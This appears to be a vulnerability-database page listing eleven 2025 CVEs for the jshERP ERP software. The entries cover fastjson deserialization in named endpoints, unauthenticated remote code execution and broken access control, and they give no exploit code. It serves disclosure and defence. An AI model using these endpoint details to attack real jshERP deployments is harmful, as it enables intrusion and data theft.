jshERP
by jshERP
Source repositories
CVEs (31)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-51744 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks. | |||
| CVE-2025-51742 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads. | |||
| CVE-2025-51745 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks. | |||
| CVE-2025-51746 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks. | |||
| CVE-2025-60800 | 0.00 | — | 0.00 | Oct 28, 2025 | Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request. | |||
| CVE-2025-60801 | 0.00 | — | 0.00 | Oct 24, 2025 | jshERP up to commit fbda24da was discovered to contain an unauthenticated remote code execution (RCE) vulnerability via the jsh_erp function. | |||
| CVE-2025-55371 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/PersonController.java of jshERP v3.5 allows unauthorized attackers to obtain all the information of the handler by executing the getAllList method. | |||
| CVE-2025-55366 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component \controller\UserController.java of jshERP v3.5 allows attackers to arbitrarily reset user account passwords and execute a horizontal privilege escalation attack. | |||
| CVE-2025-55370 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component \controller\ResourceController.java of jshERP v3.5 allows unauthorized attackers to obtain all the corresponding ID data by modifying the ID value. | |||
| CVE-2025-55368 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component \controller\RoleController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account. | |||
| CVE-2025-55367 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component \controller\SupplierController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account. |
- CVE-2025-51744Nov 25, 2025risk 0.00cvss —epss 0.00
An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks.
- CVE-2025-51742Nov 25, 2025risk 0.00cvss —epss 0.00
An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads.
- CVE-2025-51745Nov 25, 2025risk 0.00cvss —epss 0.00
An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks.
- CVE-2025-51746Nov 25, 2025risk 0.00cvss —epss 0.00
An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks.
- CVE-2025-60800Oct 28, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request.
- CVE-2025-60801Oct 24, 2025risk 0.00cvss —epss 0.00
jshERP up to commit fbda24da was discovered to contain an unauthenticated remote code execution (RCE) vulnerability via the jsh_erp function.
- CVE-2025-55371Aug 21, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the component /controller/PersonController.java of jshERP v3.5 allows unauthorized attackers to obtain all the information of the handler by executing the getAllList method.
- CVE-2025-55366Aug 21, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the component \controller\UserController.java of jshERP v3.5 allows attackers to arbitrarily reset user account passwords and execute a horizontal privilege escalation attack.
- CVE-2025-55370Aug 21, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the component \controller\ResourceController.java of jshERP v3.5 allows unauthorized attackers to obtain all the corresponding ID data by modifying the ID value.
- CVE-2025-55368Aug 21, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the component \controller\RoleController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
- CVE-2025-55367Aug 21, 2025risk 0.00cvss —epss 0.00
Incorrect access control in the component \controller\SupplierController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account.
Page 2 of 2